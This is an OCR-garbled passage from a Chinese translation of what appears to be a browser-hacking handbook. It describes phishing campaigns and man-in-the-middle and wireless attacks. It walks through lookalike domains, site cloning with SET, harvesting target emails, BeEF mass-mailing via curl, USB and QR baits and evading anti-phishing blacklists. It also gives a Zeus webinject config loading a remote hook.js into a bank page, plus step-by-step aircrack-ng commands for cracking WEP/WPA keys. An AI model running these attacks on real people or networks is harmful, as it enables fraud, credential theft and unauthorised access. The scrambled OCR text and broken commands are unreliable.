配置 好 主机 环境 并 启动 之 后 , 还 要 注册 一 个 与 内 容 匹配 的 域名 。 跟 虚拟 计算 的 价格 趋势 类 似 ， 
由 于 注册 商 之 间 竞 争 的 原因 ， 域 名 注册 费用 现在 也 不 算 高 了 。 像 namecheap.com 或 godaddy.com 这 
些 域名 注册 商 ，.com 域 名 的 报价 是 每 年 大 约 10 美 元 。 按 照 钓 鱼 的 思路 ， 比 如 可 以 注册 一 个 域名 叫 
“europowerregulator.com”， 或 者 让 其 看 起 来 像 是 它 的 分 支 机 构 。 


David Kennedy 的 社会 工程 工具 箱 ( Social-Engineer Toolkit, SET ) 里 也 包含 Web 克 隆 功 能 。 
SET 不 仅 能 克隆 网 页 ， 同 样 也 能 注入 恶意 代码 。 比 如 ， 它 可 注入 恶意 Java 小 程序 或 Metasploit 
浏览 器 利用 代码 ,可 以 在 这 个 地 址 下 载 SET: https://github.com/trustedsec/social-engineer-toolkit/。 

要 使 用 SET 的 Java 小 程序 攻击 ， 包 括 Web 克 隆 ， 先 通过 suqo ./set 运 行 SET， 然 后 再 执行 
以 下 几 步 : 

(1) 选择 Website Attack Vectors ; 

(2) 选择 Java Applet Attack Method; 

(3) 选择 Site Cloner; 

(4) 输入 你 想 克 隆 的 URL; 

(5) 继续 设置 后 续 的 内 容 或 修改 shell 选 项 。 

SET 的 Web 服 务 器 开始 侦 听 请 求 后 ， 可 以 通过 设备 的 耳 地址 来 查看 。 


P 

























































































URLCrazy 


URLCrazy 是 Andrew Horton 开 发 的 ， 确 实 是 一 个 非常 不 错 的 实用 工具 ， 可 以 帮 你 自动 生成 
可 能 输 错 的 域名 或 其 他 变 体 。 下 载 地 址 为 http://wwwImorningstarsecurity.comy/research/urlcrazy。 
可 以 通过 执行 下 列 命令 运行 它 : 

oe ee <domain> 


图 2-3 展 示 了 以 上 命令 执行 后 的 输出 。 
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~/lobs/ur lcrazy/ur Lcrazy_0. 5 $ -furlerazy www. browserhacker . com 

URLCrazy Domain Report 

Domain 1 www .browserhacker .com 

Keyboard : qwerty 

At : 2013-11-24 12:37:54 +0800 

# Please wait. 226 hostnames to process 

Typo Type Typo DNS-AÀ CC-AÀ DNS-MX Extn 
Character Omission ww .browserhacker .com ? com 
Character Omission www .bowserhacker .com T com 
Character Omission www .broserhacker .com ? com 
Character Omission www .browerhacker .com ? com 
Character Omission www .browsehacker .com ? com 
Character Omission www .browseracker .com ? com 
Character Omission www .browserhacer .com ? com 
Character Omission www .browserhacke .com T com 
Character Omission www .browserhacker .cm ? cm 
Character Omission www .browserhackr .com ? com 
Character Omission www .browserhaker .com T com 
Character Omission www .browserhcker .com ? com 
Character Omission www .browsrhacker .Com ? com 
Character Omission www .brwserhacker .com ? com 
[Character Omission www .rowserhacker .com ? Com 








图 2-3”URLCrazy 的 输出 


还 可 以 使 用 短 URL 进 一 步 模糊 钓鱼 网 站 的 信息 。 这 个 策略 特别 适合 以 移动 设备 为 目标 的 攻击 。 
拥有 域名 的 好 处 还 包括 能 够 在 DNS 记 录 中 配置 SPF ( Sender Policy Framework, 发 件 人 策略 框 
架 )。 在 DNS 中 将 SPF 配 置 为 SPF 或 TXT 记 录 ， 可 以 指定 哪个 IP 地 址 能 够 自己 向 外 发 送 电 子 邮 件 。 
SPF 的 目的 是 杜绝 垃圾 邮件 发 送 者 以 他 们 本 来 没有 权限 的 域 的 名 义 发 送 邮 件 。SMTP 服 务 右 
接收 到 特定 IP 地 址 发 送 的 邮件 后 ， 可 以 查询 对 应 域 的 SPF 记 录 ， 验 证 该 IP 是 否 被 允许 发 送 电 子 邮 
件 。 比 如 ，microsoftcom 的 TXT 记录 中 包含 如 下 信息 : 


v=spfl include: spf-a.microsoft.com include: spf-b.microsoft.com include: spf-c. 
microsoft.com include: spf-ssg-a.microsoft.com ip4:131.107.115.215 ip4:131.107. 
115.214 ip4:205.248.106.64 ip4:205.248.106.30ip4:205.248.106.32 -all" 


这 条 记录 的 含义 如 下 。 

O v=spf1: SPF 的 版 本 是 1。 

O include: 对 每 个 includqe 语 句 ， 都 查询 DNS 条 目 中 的 SPF 记 录 ， 这 样 SPF 记 录 就 可 以 引 

用 其 他 源 的 策略 。 

口 ip4: 对 每 个 ip4 R5, 都 查询 电子 邮件 是 否 来 自 该 特定 的 全 地 址 。 

口 ~all: 最 后 的 这 个 语句 是 前 面 的 选项 都 不 匹配 时 返回 的 结果 ， 对 所 有 其 他 源 返 回 
SOFTFAIL ( 软 失败 )。 由 ~ 表示 的 SOFTFAIL 是 一 个 SPF 限 定 符 , 其 他 限定 符 还 有 表示 PASS 
(测试 通过 ) 的 +， 表 示 NEUTRAL ( 不置可否 ) 的 ?， 表 示 FAIL (测试 失败 ) 的 -。 通 常 ， 

带 SOFTFAI 标记 的 消息 是 可 以 接受 的 ， 但 可 能 会 被 加 上 垃圾 邮件 的 标签 。 

在 钓鱼 网 站 的 域 中 设置 了 有 效 的 SPF 记 录 后 ， 你 发 送 的 邮件 就 不 太 可 能 被 发 送 代 理 和 客户 端 
当成 垃圾 邮件 了 。 这 样 才 能 进行 到 下 一 阶段 ， 即 生成 实际 的 钓鱼 邮件 。 

Q) 第 二 阶段 : 钓鱼 邮件 
通过 努力 构建 了 像 那么 回 事 的 钓鱼 网 站 之 后 ， 接 下 来 需要 考虑 怎么 引诱 目标 上 钧 了 。 过 去 ， 


HWI 
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引诱 目标 的 方式 主要 是 钓鱼 邮件 。 图 2-1 展 示 了 一 封 以 在 线 银行 名 义 发 送 的 钓鱼 邮件 。 不 过 ， 在 
攻击 目标 的 过 程 中 ,我们 通常 能 了 解 有 关 目 标的 更 多 信息 , 从 而 让 邮件 的 措辞 和 格式 不 那么 泛泛 。 

首先 ， 需 要 生成 目标 的 电子 邮件 地 址 。 利 用 Google、LinkedIn 及 其 他 社交 媒体 网 站 ， 这 一 步 
可 能 并 不 难 。Maltego5 、jigsaw.com 、theHarvester“ 和 Recon-ng 等 工具 可 以 帮 上 你 的 忙 。 CI 


获取 联系 人 信息 

Recon-ng 是 用 Python 写 的 模块 化 的 Web 侦 察 框 架 ， 它 的 下 载 地 址 是 https://bitbucket. 
org/LaNMaSteR53/recon-ng。 这 个 工具 有 一 个 类 似 控制 台 的 界面 ， 像 Metasploit 的 那 种 。 要 从 
jigsaw.com 获 取 电 子 邮 件 地 址 , 需 先 通过 执行 . /zecon-ng 启 动 Recon-ng ,然后 再 执行 以 下 步骤 : 


recon-ng 



















































































> use recon/contacts/gather/http/jigsaw 
recon-ng [jigsaw] > set COMPANY < 目标 公司 名 > 
recon-ng [jigsaw] > set KEYWORDS < 你 想 追 加 的 关键 词 > 
recon-ng [jigsaw] > run 

recon-ng [jigsaw] > back 

recon-ng > use reporting/csv_file 

recon-ng [csv_file] > run 


在 数据 文件 夹 内 ， 会 生成 一 个 results.csv 文 件 ， 其 中 包含 获取 的 联系 人 信息 。 如 果 你 有 
LinkedIn API 的 访问 键 ， 还 可 以 使 用 recon/contacts/gather/http/linkedin auth 模 块 。 

theHarvester 是 另 一 个 类 似 的 Python 脚 本 ， 可 以 在 这 里 下 载 : http://www.edge-security.com/ 
theharvester.php。 与 Recon-ng 类 似 ，theHarvester 可 以 利用 开源 搜索 引擎 ， 以 及 API 了 驱动 的 数据 
库 ， 来 构建 电子 邮件 的 联系 人 列表 。 要 使 用 theHarvester， 只 需 执 行 以 下 命令 : 


./theHarvester.py -d < 目标 域 > -1 < 有 限 的 结果 数量 >\ 
-b < 数据 源 : 例如 google> 


























取得 了 电子 邮件 地 址 的 列表 后 ， 下 一 步 是 制作 诱饵 。 与 构建 钓鱼 网 站 类 似 ， 必 须 做 到 让 邮件 
的 内 容 看 起 来 像 真 的 一 样 。 

当然 ， 最 终 你 得 把 邮件 发 给 目标 用 户 。 发 送 邮 件 的 一 个 方法 ， 就 是 使 用 BeEF 的 社会 工程 邮 
件 群发 需 。 


使 用 BeEF 的 邮件 群发 器 

BeEF 的 邮件 群发 器 在 使 用 前 需要 设置 一 下 。 设 置 之 后 ， 就 可 以 方便 地 群发 纯 文本 以 及 
HTML 格 式 的 邮件 了 。 

首先 ， 配 置 邮件 群发 器 。 打 开 并 编辑 beef/extensions/social engineering/config.yaml， 找 到 


mass_mailer 部 分 : 






























































user_agent: "Microsoft-MacOutlook/12.12.0.111556" 
host: "<SMTP 服 务 器 地 址 >" 


port: <SMTP 服 务 器 端口 > 


42 第 2 章 初始 控制 





use_auth: <truexfalse> 

use tls: <truexfalse> 

helo: "< 发 件 地 址 域名 ， 如 : europowerregulator.com»" 

from: "< 发 件 地 址 ， 如 : marketing@europowerregulator.com>" 
password: "<SMTP 服 务 器 密码 >" 


接 下 来 要 配置 电子 邮件 模板 。 在 生成 实际 使 用 的 模板 之 前 ， 必 须 配 置 模 板 依赖 的 资源 ， 比 
如 图 片 等 。 配 置 要 在 社会 工程 扩展 的 配置 文件 中 进行 。BeEF 中 提供 了 一 个 名 为 “edfenergy” 
的 示例 ， 还 在 那个 config.yaml 文 件 中 ， 可 以 找到 其 配置 项 : 


edfenergy: 
images: ["corner-tl.png", "main.png", "edf logo.png", 
"promo-corner-left.png", "promo-corner-right-arrow.png", 
"promo-reflection.png", "2012.png", "corner-bl.png", 
"corner-br.png", "bottom-border.png"] 
images, cids: 
cidl1: "corner-tl.png" 


Crue Mere 

Cicos “edi koce pig” 

cid4:  "promo-corner-left.png" 

cid5:  "promo-corner-right-arrow.png" 
cid6:  "promo-reflection.png" 

cuu OT png 

cide: C'ogrbser-blopng" 

cicha  *corner-or. ong” 


cidl10: "bottom-border.png" 


这 里 配置 的 主要 是 将 来 模板 中 会 被 替换 的 图 片 以 及 ID 引用 。 实 际 的 邮件 模板 位 于 beef/ 
extensions/social engineering/mass mailer/templates/edfenergy/ F , 有 mail.plain 和 mail.html 两 个 文 
件 。 这 两 个 文件 会 利用 一 个 简单 的 模板 系统 ,动态 蔡 换 完 相关 内 容 后 再 发 送出 去 ,包括 替换 本 
地 图 片 和 收 件 人 。 

通过 BeEF 的 邮件 群发 器 发 送 的 图 片 没有 在 线 版 本 。 这 些 图 片 会 从 网 上 被 下 载 下 来 ， 然 后 
25 85 7] base644 AKA OF EARS Ho RAAT A mail. html, 就 会 看 到 “ name ”和 “ link ", 
这 些 内 容 将 在 发 送 前 被 动态 替换 。 与 Web 克 隆 程序 类 似 ， 邮 件 群 发 器 也 是 通过 REST 风 格 的 API 
执行 的 。 在 BeEF 运 行 的 情况 下 ， 打 开 一 个 新 的 终端 ， 然 后 执行 以 下 curl 命 令 : 

curl -H "Content-Type: application/json; charset=UTF-8"\ 

-d '{"template":"edfenergy", "subject": "<=>", \ 

"frommame":"< 发 件 人 >", "link": "<4 % A 3kURL>", \ 

"Linktext":"< 骗 人 的 链接 文字 >" "recipients":[{"< 目 标的 邮箱 >" :N 

"< 目标 的 名 字 >"，"< 目 标 2 的 邮箱 >" : "< 目标 2 的 名 字 >"}]}' \ 

-X POST http://<BeEFURL>/api/seng/send_mails?token=<token> 
通过 这 里 的 选项 ， 可 以 配置 以 下 内 容 。 
O template: 配置 要 使 用 的 模板 ， 在 这 里 就 是 要 使 用 edfenergy 模 板 。 
O subject: 设置 钓鱼 邮件 的 主题 。 
O fromname: 设置 发 件 人 的 名 字 ， 不 一 定 与 全 局 配置 中 的 from 字 段 值 一 样 。 
O link: 设置 钓鱼 网 站 地 址 。 
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O linktext: 有 的 模板 中 需要 嵌入 钓鱼 网 站 的 链接 ， 但 显示 的 是 这 里 设置 的 链接 文字 。 

口 recipients: 这 个 字段 由 多 个 收 件 人 的 名 字 和 邮件 地 址 构成 , SPIRALS MA, 
FARAN 

O BeEFURL: 指向 BeEF 实 例 的 URL。 

O token: BeEF 的 REST 风 格 API 的 访问 键 ， 用 于 访问 BeEF 服 务 器 。 

执行 以 上 命令 后 ，BeEF 控 制 台 就 会 显示 如 下 信息 : 


Mail 1/2 to [targetl@email.com] sent. 





Mail 2/2 to [target2@email.com] sent. 




















(U 


发 送 完 钓鱼 邮件 后 , 钓鱼 活动 就 正式 开始 了 。 但 在 向 真正 的 目标 发 送 邮 件 之 前 ,最 好 拿 自 
先 测 斌 一下。 通过 测试 可 以 修改 邮件 模板 或 者 钓鱼 网 站 中 存在 的 问题 。 

2. 诱饵 
巴 攻击 目标 引诱 到 钓鱼 网 站 不 一 定 非 要 通过 钓鱼 邮件 。 随 着 时 间 推 移 ,， 社会 工程 技术 的 发 展 
也 产生 了 物理 诱饵 。2004 年 ， 安 全 研究 人 员 就 实地 演示 过 怎么 使 用 物理 诱饵 。 当 时 ， 他 们 就 在 大 
街 上 强制 路 人 用 密码 交换 巧克力 一。 

当然 , 只 是 知道 某 人 的 电脑 密码 也 不 一 定 能 帮 你 侵入 他 的 浏览 器 。 不 过 你 也 可 以 把 U 盘 (USB 
闪存 驱动 器 ) 偷偷 地 放 在 大 街 上 某 个 地 方 。 要 是 有 人 看 见 并 拾 走 , 那 他 很 可 能 会 把 它 带 到 家 里 插 
到 自己 的 电脑 上 ， 看 看 里 面 有 什么 。 毕 竟 ， 人 人 都 有 好 奇 心 嘛 ! 
使 用 U 盘 就 可 能 引诱 用 户 通过 浏览 器 打开 由 攻击 者 控制 的 网 站 。 很 简单 ， 只 要 在 U 盘 里 保存 
一 个 HTMIL 文 件 ， 里 面包 含 一 个 点 击 就 打开 钓鱼 网 站 的 链接 即 可 。 因 为 HTML 文 件 随 处 可 见 ， 所 
以 放 到 一 个 外 部 存储 器 上 也 没什么 大 不 了 ， 所 在 防 病 毒 软件 通常 不 会 怀疑 。 自 然 ， 把 U 盘 换 成 光 
盘 也 一 样 。 另 一 个 刚刚 出 现 的 诱饵 技术 是 使 用 恶意 的 QR (quick response， 快 速 响应 ) 码 ， 比 如 
适合 智能 手机 扫描 的 二 维 码 ， 现 在 就 很 流行 。 图 2-4 展 示 了 一 个 QR 码 。QR 码 最 初 应 用 于 制造 业 ， 
方便 快速 扫描 识别 商品 信息 ,其 应 用 范围 越 来 越 广 , 海报 、 公 交 车 站 以 及 其 他 零售 商品 上 随处 可 
见 QR 码 。 

只 要 手机 里 安装 了 QR 码 应 用 ， 就 可 以 用 摄像 头 扫 描 QR 码 ， 然 后 显示 出 文本 信息 。 如 果 QR 
码 是 一 个 URL， 手 机 就 会 将 该 URL 发 送 给 浏览 咒 ， 某 些 情况 下 浏览 器 甚至 会 自动 打开 链接 。 相 
据 赛 门 铁 克 公司 的 研究 “， 很 多 想 干 坏事 的 人 会 印刷 一 些 带 QR 码 的 标签 ， 把 它们 贴 到 人 流 密集 
的 地 方 。 

生成 QR 码 也 很 简单 ， 比 如 可 以 使 用 谷歌 的 Chart APT", 访问 下 面 的 地 址 ,就 可 以 用 这 个 工具 
生成 QR 码 ， 这 个 QR 码 里 需要 包含 宽度 、 高 度 和 需要 编码 的 信息 等 参数 : 

https://chart.googleapis.com/chart?cht-qr&chs-300x300&chl-http://browserhacker.com 

此 外 ，BeEF 也 有 一 个 QR Code Generator 模 块 ， 能 够 为 你 生成 Google Chart 的 URL。 配 置 这 个 
扩展 需要 编辑 beef/extensions/qrcode/config.yaml 文 件 : 
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enable: true 
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target: ["http://«4] @URL>","/<BeEF #49 xp} 4 >" ] 
qrsize: "300x300" 
配置 之 后 ， 启 动 BeEF 就 会 给 出 相应 的 Google Chart 的 URL。 








图 2-4 QRS 


别 忘 了 利用 URL 缩 短 和 其 他 模糊 技术 隐藏 钓鱼 
3. 反 钓 鱼 机 制 





在 进行 钓鱼 攻击 的 时 候 , 一 定 要 知道 有 一 些 机 制 会 不 断 给 我 们 


yA 


邮件 客户 端 都 会 尽力 降低 钓鱼 及 钓鱼 邮件 伤害 收 件 
减少 你 的 邮件 被 标记 为 垃圾 邮件 的 机 会 ,但 千 万 不 








网 站 的 地 址 。 

出 造 麻烦 。 现 代 浏 览 器 和 电子 
人 的 可 能 性 。 前 面 介绍 了 配置 SPF 记 录 有 助 于 
能 低估 浏览 器 检测 恶意 内 容 的 能 









































Chrome 和 Firefox 都 在 使 用 的 谷歌 的 Safe Browsing API*， 就 是 一 个 随时 可 以 通过 互联 网 访问 


的 API， 人 允许 浏览 如 在 泻 染 之 前 检测 URL 的 正确 性 。 





月 





户 给 出 提示 ， 还 会 报告 存在 恶意 内 容 的 站 点 。 











这 个 API 不 仅 能 根据 个 人 报名 





和 的 钓鱼 网 站 向 








如 果 你 的 钓鱼 攻击 目标 很 罕 , 那么 其 中 一 个 目标 会 上 报 你 的 域 或 者 ( 至少 初始 时 ) 被 自动 发 


现 的 可 能 性 就 会 比较 小 。 有 效 

















网 站 的 第 一 个 小 时 内 泄露 自己 的 信息 。 


的 钓鱼 攻击 的 这 段 时 间 被 称 为 “钓鱼 攻击 黄金 第 一 小 时 ”( Golden 
Hour of Phishing Attacks )。 这 是 因为 Trusteer 的 研究 "表明 ，50% 的 钓鱼 攻击 受 包 


y 





者 会 在 打开 钓鱼 





r1 


其 他 反 钓 鱼 工 具 


面 几 个 : 

O 下 的 Anti-Phishing Filter 

口 McAfee 的 SiteAdvisor 

口 Web of Trust 的 WOT 插 件 

口 PhishTank 的 播 件 

口 Netcraft 的 Anti-Phishing 扩 展 








关键 在 于 怎么 让 你 发 送 的 邮件 范围 与 多 








fa vl es 


除了 谷歌 的 Safe Browsing API， 还 有 很 多 工具 尝试 让 用 户 远离 可 能 不 安全 的 站 点 ， 比 如 下 


恰当 地 匹配 。 发 送 的 邮件 太 多 , 网 站 很 可 能 短 
































时 间 内 被 人 举报 。 发 送 的 邮件 太 少 ， 访 问 钩 鱼网 站 





的 人 又 太 少 。 
































另 一 个 防止 钓鱼 网 站 被 列 人 黑 名 单 的 技术 , 就 是 启用 防火 墙 或 .htaccess 规 则 。 经 过 配置 之 后 ， 
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可 以 仅 在 目标 通过 自己 组 织 的 Web 代 理 接收 网 页 时 ， 才 会 显示 钓鱼 内 容 。 

这 个 机 制 的 一 个 高 级 的 版 本 是 被 RSA 公 司 称 为 “bouncerphishing kit”2 的 技术 。 这 个 钓鱼 工 
具 包 会 自动 把 钓鱼 URL 动 态 分 发 给 目标 , 如 果 重 复 访问 同一 内 容 的 ID 不 唯一 ,或 者 访问 次 数 太 多 ， 
钓鱼 网 站 就 会 返回 HTTP 404 错 误 。 

如 前 所 述 ， 有 时 候 单 凭 技术 不 可 能 向 隐患 Web 应 用 插入 初始 指令 , 或 者 获得 某 个 沟通 渠道 的 
访问 权限 。 这 时 候 , 你 就 只 能 面向 终端 用 户 了 。 只 要 动机 选择 合适 ， 人 们 通常 都 情愿 做 出 可 能 让 
自己 受害 的 举动 。 不 要 低估 使 用 社会 工程 技术 控制 浏览 器 的 威力 。 


2.2.5 ”使 用 中 间 人 攻击 


用 于 在 目标 浏览 器 中 艇 入 初始 控制 代码 的 方法 , 不 一 定局 限 在 通信 的 两 端 。 一 种 叫 作 中 间 人 
( Man-in-the-Middle attack， 简 称 MitM ) 攻击 的 老 技 术 ， 自 从 人 类 相互 之 间 通 过 不 可 信 渠 道 发 送 
信息 开始 ， 就 一 直 是 一 种 流行 的 攻击 技术 。 

中 间 人 攻击 的 概念 非常 简单 ， 就 是 敌人 通过 窃听 , 有 可 能 在 信息 从 发 送 者 传输 至 接收 者 的 过 
EPRE. 为 了 实现 这 种 攻击 ,必须 确保 发 送 者 和 接收 者 都 无 法 知道 自己 的 通信 内 容 被 第 三 方 
看 过 或 者 修改 过 。 

密码 学 的 一 个 挑战 就 是 要 发 明 保证 通信 安全 的 技术 , 特别 是 要 减 小 中 间 人 攻击 的 可 能 性 。 
此 , 很 多 加 密 算法 主要 是 同时 关注 提高 机 密 性 和 完整 性 。 与 所 有 安全 增强 和 措施 的 情况 一 样 , 信 
息 与 通信 安全 的 每 一 次 进步 ， 都 会 伴随 着 攻击 者 迅速 地 找到 绕 过 相应 安全 手段 的 方法 。 

随 着 浏览 器 日 益 成 为 上 网 获取 信息 的 标准 方式 , 它 在 通过 不 可 信 渠 道 发 送 和 接收 信息 的 框架 
中 ， 也 正在 扮演 越 来 越 重要 的 角色 。 这 同时 也 为 攻击 者 提供 了 向 浏览 器 中 注 和 初始 代码 的 机 会 。 

1. 浏览 器 中 间 人 攻击 

中 间 人 攻击 一 直 发 生 在 OSI 模型 的 较 低 层次 , 位 于 应 用 层 以 下 (应 用 层 是 HTTP 及 相关 协议 运 
行 的 层次 )。 而 浏览 器 中 间 人 ( Man-in-the-Browser, MitB ) 攻击 是 与 传统 中 间 人 攻击 类 似 的 一 种 
方式 ， 只 不 过 完全 发 生 在 浏览 器 中 。 大 多 数 持久 JavaScript 通 信 (AE ) 逻辑 ,实际 上 都 是 浏览 器 
中 间 人 攻击 ， 具 有 如 下 特点 : 

口 对 用 户 不 可 见 

口 对 服务 器 不 可 见 

O 能 够 修改 当前 页 面 的 内 容 
Q 能 够 读 取 当 前 页 面 的 内 容 
O 不 需要 受害 人 介入 

这 种 穷 取 信息 的 方式 也 常见 于 银行 恶意 软件 攻击 〈 比如 Zeus 或 SpyEye， 都 提供 注入 功能 )。 
这 些 方便 的 功能 可 以 让 僵尸 网 络 操作 人 员 指 定 配 置 文件 ”， 以 确定 如 何以 及 把 什么 注入 HTTP(S) 
响应 。 这 种 注入 完全 发 生 在 浏览 带 中 ， 不 会 影响 浏览 右 的 SSL 机 制 。 举 个 例子 : 

set_url https://www.yourbank.com/* 


data_before 
<div class='footer'> 
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data_end 

data_inject 

<script src='https://browserhacker.com/hook.js'></script> 
data_end 

data_after 

</body> 

data_end 


这 是 Zeus 配 置 文件 中 的 通用 配置 ,这 些 配 置 项 会 在 浏览 器 访问 https:/www.yourbank.com/ 中 的 
王 意 网 页 时 被 激活 。 它 会 查找 <div class='footer'>， 然 后 再 插入 新 的 JavaScript 远 程 脚本 。 
这 一 点 与 我 们 前 面 介绍 的 初始 控制 的 示例 一 样 。 当 网 页 被 泻 染 后 ,浏览 器 会 加 载 脚本 ,并 认为 它 
来 自 合法 的 网 站 。 

如 果 攻 击 者 能 够 在 系统 中 启动 进程 , 特别 是 如 果 这 种 注入 发 生 在 浏览 器 所 在 进程 中 , 那么 受 
害 人 无 论 如 何 也 逃 不 掉 了 。 除 了 HTML 注 入 ， 这 类 恶意 软件 通常 还 提供 更 多 其 他 功能 ， 比 如 抓 取 
表单 、 操 作 系 统 级 的 击 键 记录 ， 以 及 屏幕 截图 等 。 

2. 无 线 攻击 

无 线 网 络 技 术 的 发 展 和 爆炸 式 应 用 , 是 计算 机 网 络 技 术 最 大 的 进步 之 一 。 JE (RAL hà 
晤 侠 的 忠告 :“ 能 力 越 大 ， 责 任 也 就 越 大 。” 

在 各 种 破坏 性 技术 当中 , 无 线 网 络 一 直 是 安全 研究 人 员 与 网 络 工程 师 之 间 和 争议 最 大 的 技术 之 
一 。 想 想 看 ， 只 要 有 人 一 通过 无 线 电波 通信 , 在 没有 电缆 约束 的 情况 下 ， 自 然 会 面 对 更 多 敌人 的 
威胁 。 

对 无 线 网 络 , 特别 是 对 IEEE 802.11 协 议 下 通信 的 最 初 威胁 , 来 自 攻击 者 对 在 空气 中 传播 的 通 
信和 内 容 机 密 性 的 破坏 。Fluhrer、Mantin 和 Shamir 最 早 于 2001 年 发 表 了 一 份 研究 报告 ， 记 载 了 对 无 
线 网 络 流量 的 窃听 2。 短 短 几 年 之 后 ， 最 早 的 802.11 标 准 被 批准 。 很 快 ， 就 有 人 发 表 了 绕 过 WEP 
(Wired Equivalent Privacy， 有 线 等 效 保密 ) 机 制 的 方法 。 


802.11 的 安全 机 制 


IEEE 802.11 标 准 问世 之 初 , 就 加 入 了 安全 机 制 , 以 降低 无 线 传输 过 程 中 泄密 、 玻 坏 完整 性 ， 
以 及 丧失 可 用 性 的 可 能 。 随 着 时 间 推 移 ， 安 全 社区 对 这 些 机 制 的 安全 漏洞 进行 了 全 面 研究 。 以 
下 内 容 简 要 概述 了 这 些 无 线 安 全 机 制 及 相应 的 缺陷 。 

SSID 隐 藏 

大 多 数 路 由 器 支持 不 广播 其 服务 设备 标识 符 〈Service Set IDentifier, SSID )。 然 而 ， 为 了 
实现 无 线 通 信 ， 无 线 客户 端 经 常 要 求 连接 到 有 名 字 的 SSID ， 从 而 会 泄露 这 个 信息 。Kismet 及 
Aircrack 等 工具 可 以 用 来 发 现 SSID。 

静态 IP 过 滤 

与 SSID 隐 藏 类 似 ， 尽 管 静态 IP 过 滤 有 可 能 限制 对 无 线路 由 器 DHCP 的 连接 ， 但 人 P 地 址 能 被 
无 线 工 具 发 现 ， 攻 击 者 只 要 在 自己 的 无 线 界面 中 进行 简单 配置 即 可 连接 。 

MAC 地 址 过 滤 

JP 地 址 过 滤 的 问题 对 MAC 地 址 过 滤 也 一 样 存在 。 使 用 无 线 工 具 找 到 连接 设备 的 MAC 地 址 
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可 以 修改 你 的 MAC 地 址 ， 伪 装 成 允许 连接 的 客户 端 


在 Windows 上 ， 通 过 配置 网 络 地 址 设置 ， e 配器 的 高 级 属性 中 修改 MAC 地 址 。 


在 Linux 上 ， 可 以 使 用 ifconfig 命 令 修 改 MAC 地 址 : 
ifconfig < 接口 > hw ether <MAC 地 址 > 

OS X 与 Linux 类 似 : 

sudo ifconfig < 接口 > ether <MAC 地 址 > 

WEP 

使 用 Aircrack-ng2 套 件 ， 只 需 简单 的 几 步 即 可 破解 WEP 密 铀 。 
(1) 在 监控 模式 下 启动 可 注入 的 无 线 适 配器 : 


airmon-ng start < 适配器 ， 例 如 : wifi0> 
< 无 线 信道 ， 例 如 : 9> 


这 样 就 把 被 动 接口 放 到 了 监控 模式 下 。 
(2) 使 用 监控 模式 适配器 测试 数据 包 注 入 。 这 个 适配器 通常 不 同 于 wifi0， 


aireplay-ng -9 -e < 目标 网 络 的 SSID> 
-a < 目标 接 入 点 的 MAC 地 址 > 
< 被 动 接口 ， 例 如 : ath0> 


(3) 开始 捕获 WEP 初 始 向 量 : 


airodump-ng -c < 无 线 信道 ， 例 如 : 9» 
--bssid < 目标 接 入 点 的 MAC 地 址 > 
-w output < 被 动 接 口 ， 例 如 : ath0> 


(4) 将 MAC 地 址 与 无 线 接 入 点 关联 : 


aireplay-ng -1 0 -e < 目标 网 络 的 SSID> 
-a < 目标 接 入 点 的 MAC 地 址 > 
-h < 我 们 的 MAC 地 址 >< 被 动 接 口 ， 例 如 : ath0> 


(5) 在 ARP 请 求 重播 模式 下 启动 Aireplay-ng， 生 成 WEP 初 始 向 量 : 


aireplay-ng -3 -b < 目标 接 入 点 的 MAC 地 址 > 
-h < 我 们 的 MAC 地 址 > 
< 被 动 接口 ， 例 如 : ath0> 


输出 的 捕获 文件 应 该 变 大 ， 因 为 其 中 有 包含 了 WEP 初 始 向 量 在 内 的 流 


WEP 证 书 ， 执 行 以 下 命令 


aircrack-ng -b < 目标 接 入 点 的 MAC 地 址 > output*.cap 

或 

aircrack-ng -K -b < 目标 接 入 点 的 MAC 地 址 > output*.cap 

WPA/WPA2 

与 破解 WEP 不 同 ， 破 解 WPA/WPA2 只 能 在 茶 些 条 件 下 行 得 通 。 其 中 


比如 Atheros 接 口 : 


量 。 要 破解 其 中 的 


一 个 条 件 是 WPA 被 配 


置 为 PSK ( Pre-Shared Key， 预 共享 密 钥 ) 模式 ， P CRI UN 
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需要 使 用 airodump-ng 等 工具 ， 捕 获 WPA/WPA2 认 证 握手 。 这 意味 着 要 等 待 茶 个 新 客户 端 
连接 , 或 者 强制 让 某 个 已 连接 的 客户 端 断 开 连接 之 后 重新 连接 。 最 后 , 通过 暴力 破解 握手 信息 ， 
得 到 PSK。 

(1) 在 监控 模式 下 启动 可 注入 的 无 线 适 配器 : 


airmon-ng start < 适配器 ， 例 如 : wifid> 
< 无 线 信 道 ， 例 如 : 9> 


这 样 就 把 被 动 接口 放 到 了 监控 模式 下 。 

(2) 开始 捕获 WPA 握 手 : 

airodump-ng -c < 无 线 信 道 ， 例 如 : 9> 

--bssid < 目标 接 入 点 的 MAC 地 址 > 

-w psk < 被 动 接口 ， 例 如 : ath0> 

(3) 现在 可 以 强制 某 个 客户 端 解除 认证 ， 并 寄 希 望 于 该 客户 端 会 重新 请 求 认证 : 
aireplay-ng -0 1 -a < 目标 接 入 点 的 MAC 地 址 > 

-c < 想 要 邻 其 重新 认证 的 客户 端的 MAC 地 址 > 

< 被 动 接口 ， 例 如 : ath0> 

(4) 捕获 到 握手 信息 之 后 ， 着 手 破解 它 : 


aircrack-ng -w < 密码 字典 文件 > 
-b < 目标 接 入 点 的 MAC 地 址 > psk*.cap 























尽管 窃听 网 络 流 量 对 获取 敏感 信息 可 能 有 用 , 却 不 一 定 能 够 实现 数据 算 改 。 为 了 把 初始 化 代 
人 码 般 入 网 络 流量 ， 不 能 仅仅 局 限于 使 用 纯粹 的 穷 听 技 术 。 

在 获得 某 个 无 线 网 络 的 访问 权限 后 ， 接 下 来 就 可 以 考虑 执行 其 他 网 络 攻击 ， 比 如 ARP 欺 骗 、 
Web 代 理 或 其 他 网 关 设 备 的 模拟 。 后 面 会 讨论 ARP 欺 骗 技术 。 

除了 尝试 在 未 被 授权 的 情况 下 ,访问 无 线 网 络 以 执行 中 间 人 攻击 , 还 可 以 采用 其 他 技术 ， 比 
如 欺骗 客户 端 ， 使 其 相信 你 是 无 线 接 入 点 。 这 种 接 入 点 通常 被 称 为 流 谍 接 入 点 (rogue access 
points )， 运 行 方式 也 不 止 一 种 。 

一 种 方式 是 简单 地 加 入 一 个 已 经 有 广播 的 (打开 的 ) 无 线 网 络 , 然后 使 用 独立 接口 连接 到 合 
法 的 无 线 网 络 。 另 一 种 方式 则 是 强制 解除 对 无 线 客户 端的 认证 , 然后 用 比 合 法 路 由 更 强 的 信号 广 
播 ， 伪 装 成 接 人 点 。 

